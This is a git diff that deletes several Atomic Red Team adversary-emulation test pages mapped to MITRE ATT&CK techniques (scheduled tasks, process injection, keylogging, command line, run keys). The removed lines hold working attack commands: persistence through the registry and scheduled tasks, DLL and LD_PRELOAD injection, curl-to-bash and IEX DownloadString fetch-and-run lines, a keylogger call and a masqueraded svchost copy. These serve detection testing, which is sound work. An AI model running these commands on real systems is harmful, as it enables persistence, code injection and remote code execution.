-New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
-Start-Service -Name "#{service_name}"
-```
-
-#### Cleanup Commands:
-```powershell
-Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
-try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
-catch {}
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Service binary must exist on disk at specified location (#{binary_path})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{binary_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1053.md b/Atomic_Threat_Coverage/Triggers/T1053.md
deleted file mode 100644
index 40d528c..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1053.md
+++ /dev/null
@@ -1,152 +0,0 @@
-# T1053 - Scheduled Task
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053)
-<blockquote>Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system. (Citation: TechNet Task Scheduler Security)
-
-An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - At.exe Scheduled task](#atomic-test-1---atexe-scheduled-task)
-
-- [Atomic Test #2 - Scheduled task Local](#atomic-test-2---scheduled-task-local)
-
-- [Atomic Test #3 - Scheduled task Remote](#atomic-test-3---scheduled-task-remote)
-
-- [Atomic Test #4 - Powershell Cmdlet Scheduled Task](#atomic-test-4---powershell-cmdlet-scheduled-task)
-
-
-<br/>
-
-## Atomic Test #1 - At.exe Scheduled task
-Executes cmd.exe
-Note: deprecated in Windows 8+
-
-Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-at 13:20 /interactive cmd
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Scheduled task Local
-Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| task_command | What you want to execute | String | C:&#92;windows&#92;system32&#92;cmd.exe|
-| time | What time 24 Hour | String | 72600|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
-```
-
-#### Cleanup Commands:
-```cmd
-SCHTASKS /Delete /TN spawn /F >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Scheduled task Remote
-Create a task on a remote system.
-
-Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| task_command | What you want to execute | String | C:&#92;windows&#92;system32&#92;cmd.exe|
-| time | What time 24 Hour | String | 72600|
-| target | Target | String | localhost|
-| user_name | Username DOMAIN&#92;User | String | DOMAIN&#92;user|
-| password | Password | String | At0micStrong|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
-```
-
-#### Cleanup Commands:
-```cmd
-SCHTASKS /Delete /TN "Atomic task" /F >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Powershell Cmdlet Scheduled Task
-Create an atomic scheduled task that leverages native powershell cmdlets.
-
-Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. 
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$Action = New-ScheduledTaskAction -Execute "calc.exe"
-$Trigger = New-ScheduledTaskTrigger -AtLogon
-$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
-$Set = New-ScheduledTaskSettingsSet
-$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
-Register-ScheduledTask AtomicTask -InputObject $object
-```
-
-#### Cleanup Commands:
-```powershell
-Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1055.md b/Atomic_Threat_Coverage/Triggers/T1055.md
deleted file mode 100644
index 18f6f18..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1055.md
+++ /dev/null
@@ -1,241 +0,0 @@
-# T1055 - Process Injection
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
-<blockquote>Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
-
-### Windows
-
-There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)
-
-* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
-* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)
-* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.
-* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018)  AtomBombing  (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)
-* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)
-
-### Mac and Linux
-
-Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)
-
-* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
-* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
-* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
-* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)
-
-Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
-
-- [Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload](#atomic-test-2---shared-library-injection-via-etcldsopreload)
-
-- [Atomic Test #3 - Shared Library Injection via LD_PRELOAD](#atomic-test-3---shared-library-injection-via-ld_preload)
-
-- [Atomic Test #4 - Process Injection via C#](#atomic-test-4---process-injection-via-c)
-
-- [Atomic Test #5 - svchost writing a file to a UNC path](#atomic-test-5---svchost-writing-a-file-to-a-unc-path)
-
-
-<br/>
-
-## Atomic Test #1 - Process Injection via mavinject.exe
-Windows 10 Utility To Inject DLLS.
-
-Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| dll_payload | DLL to Inject | Path | PathToAtomicsFolder&#92;T1055&#92;src&#92;x64&#92;T1055.dll|
-| process_id | PID of input_arguments | Integer | (get-process spoolsv).id|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$mypid = #{process_id}
-mavinject $mypid /INJECTRUNNING #{dll_payload}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Shared Library Injection via /etc/ld.so.preload
-This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
-
-Upon successful execution, bash will echo `../bin/T1055.so` to /etc/ld.so.preload. 
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| path_to_shared_library | Path to a shared library object | Path | PathToAtomicsFolder/T1055/bin/T1055.so|
-| path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1055/src/Linux/T1055.c|
-| tmp_folder | Path of the temp folder | Path | /tmp/1055|
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'
-```
-
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library})
-##### Check Prereq Commands:
-```bash
-if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; 
-```
-##### Get Prereq Commands:
-```bash
-gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Shared Library Injection via LD_PRELOAD
-This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
-
-Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| path_to_shared_library | Path to a shared library object | Path | PathToAtomicsFolder/T1055/bin/T1055.so|
-| path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1055/src/Linux/T1055.c|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-LD_PRELOAD=#{path_to_shared_library} ls
-```
-
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library})
-##### Check Prereq Commands:
-```bash
-if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; 
-```
-##### Get Prereq Commands:
-```bash
-gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Process Injection via C#
-Process Injection using C#
-reference: https://github.com/pwndizzle/c-sharp-memory-injection
-Excercises Five Techniques
-1. Process injection
-2. ApcInjectionAnyProcess
-3. ApcInjectionNewProcess
-4. IatInjection
-5. ThreadHijack
-Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| exe_binary | Output Binary | Path | T1055.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-.\bin\#{exe_binary}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - svchost writing a file to a UNC path
-svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
-Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-copy C:\Windows\System32\cmd.exe C:\svchost.exe
-C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
-```
-
-#### Cleanup Commands:
-```cmd
-del C:\T1055.txt >nul 2>&1
-del C:\svchost.exe >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1056.md b/Atomic_Threat_Coverage/Triggers/T1056.md
deleted file mode 100644
index 40ae4ee..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1056.md
+++ /dev/null
@@ -1,53 +0,0 @@
-# T1056 - Input Capture
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1056)
-<blockquote>Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception.
-
-Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)
-
-Keylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.
-
-Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Input Capture](#atomic-test-1---input-capture)
-
-
-<br/>
-
-## Atomic Test #1 - Input Capture
-Utilize PowerShell and external resource to capture keystrokes
-[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/src/Get-Keystrokes.ps1)
-Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
-
-Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| filepath | Name of the local file, include path. | Path | $env:TEMP&#92;key.log|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Set-Location $PathToAtomicsFolder
-.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item $env:TEMP\key.log -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1057.md b/Atomic_Threat_Coverage/Triggers/T1057.md
deleted file mode 100644
index aa4788d..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1057.md
+++ /dev/null
@@ -1,77 +0,0 @@
-# T1057 - Process Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1057)
-<blockquote>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-### Windows
-
-An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility.
-
-### Mac and Linux
-
-In Mac and Linux, this is accomplished with the <code>ps</code> command.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Process Discovery - ps](#atomic-test-1---process-discovery---ps)
-
-- [Atomic Test #2 - Process Discovery - tasklist](#atomic-test-2---process-discovery---tasklist)
-
-
-<br/>
-
-## Atomic Test #1 - Process Discovery - ps
-Utilize ps to identify processes.
-
-Upon successful execution, sh will execute ps and output to /tmp/loot.txt. 
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | path of output file | path | /tmp/loot.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-ps >> #{output_file}
-ps aux >> #{output_file}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Process Discovery - tasklist
-Utilize tasklist to identify processes.
-
-Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. 
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-tasklist
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1058.md b/Atomic_Threat_Coverage/Triggers/T1058.md
deleted file mode 100644
index d55b31f..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1058.md
+++ /dev/null
@@ -1,44 +0,0 @@
-# T1058 - Service Registry Permissions Weakness
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1058)
-<blockquote>Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)
-
-If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
-
-Adversaries may also alter Registry keys associated with service failure parameters (such as <code>FailureCommand</code>) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Service Registry Permissions Weakness](#atomic-test-1---service-registry-permissions-weakness)
-
-
-<br/>
-
-## Atomic Test #1 - Service Registry Permissions Weakness
-Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. 
-reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| weak_service_name | weak service check | String | weakservicename|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
-get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1059.md b/Atomic_Threat_Coverage/Triggers/T1059.md
deleted file mode 100644
index 3a0462f..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1059.md
+++ /dev/null
@@ -1,42 +0,0 @@
-# T1059 - Command-Line Interface
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059)
-<blockquote>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)).
-
-Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Command-Line Interface](#atomic-test-1---command-line-interface)
-
-
-<br/>
-
-## Atomic Test #1 - Command-Line Interface
-Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
-
-Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash
-wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash
-```
-
-#### Cleanup Commands:
-```sh
-rm /tmp/art-fish.txt
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1060.md b/Atomic_Threat_Coverage/Triggers/T1060.md
deleted file mode 100644
index c13aa68..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1060.md
+++ /dev/null
@@ -1,152 +0,0 @@
-# T1060 - Registry Run Keys / Startup Folder
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1060)
-<blockquote>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
-
-The following run keys are created by default on Windows systems:
-* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
-* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
-* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
-* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
-
-The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)
-
-The following Registry keys can be used to set startup folder items for persistence:
-* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
-* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
-* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
-* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
-
-The following Registry keys can control automatic startup of services during boot:
-* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
-* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
-* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
-* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
-
-Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
-* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
-* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
-
-The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</code> and <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</code> subkeys can automatically launch programs.
-
-Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run when any user logs on.
-
-By default, the multistring BootExecute value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
-
-
-Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Reg Key Run](#atomic-test-1---reg-key-run)
-
-- [Atomic Test #2 - Reg Key RunOnce](#atomic-test-2---reg-key-runonce)
-
-- [Atomic Test #3 - PowerShell Registry RunOnce](#atomic-test-3---powershell-registry-runonce)
-
-
-<br/>
-
-## Atomic Test #1 - Reg Key Run
-Run Key Persistence
-
-Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be via stdout. 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command_to_execute | Thing to Run | Path | C:&#92;Path&#92;AtomicRedTeam.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
-```
-
-#### Cleanup Commands:
-```cmd
-REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Reg Key RunOnce
-RunOnce Key Persistence.
-
-Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| thing_to_execute | Thing to Run | Path | C:&#92;Path&#92;AtomicRedTeam.dll|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
-```
-
-#### Cleanup Commands:
-```cmd
-REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - PowerShell Registry RunOnce
-RunOnce Key Persistence via PowerShell
-Upon successful execution, a new entry will be added to the runonce item in the registry.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| thing_to_execute | Thing to Run | Path | powershell.exe|
-| reg_key_path | Path to registry key to update | Path | HKLM:&#92;Software&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;RunOnce|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$RunOnceKey = "#{reg_key_path}"
-set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1062.md b/Atomic_Threat_Coverage/Triggers/T1062.md
deleted file mode 100644
index 009d60b..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1062.md
+++ /dev/null
@@ -1,46 +0,0 @@
-# T1062 - Hypervisor
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1062)
-<blockquote>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Installing Hyper-V Feature](#atomic-test-1---installing-hyper-v-feature)
-
